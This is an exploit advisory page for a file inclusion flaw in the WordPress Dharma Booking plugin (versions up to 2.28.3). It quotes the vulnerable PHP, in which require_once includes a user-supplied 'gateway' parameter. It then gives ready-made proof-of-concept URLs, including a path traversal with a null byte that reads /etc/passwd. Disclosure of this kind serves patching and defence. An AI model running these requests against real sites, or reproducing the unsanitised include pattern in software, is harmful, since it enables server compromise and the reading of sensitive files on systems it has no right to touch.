WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion

2016.03.23
Credit: AMAR^SHG
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Wordpress Dharma booking File Inclusion # Date: 03/22/2016 # Exploit Author: AMAR^SHG # Vendor Homepage:https://wordpress.org/plugins/dharma-booking/ <https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software Link : https://wordpress.org/plugins/dharma-booking/ # Version: <=2.28.3 # Tested on: WINDOWS/WAMP dharma-booking/frontend/ajax/gateways/proccess.php's code: <?php include_once('../../../../../../wp-config.php'); $settings = get_option('Dharma_Vars'); echo $settings['paymentAccount']. $settings['gatewayid']; require_once($_GET['gateway'].'.php'); // POC: http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top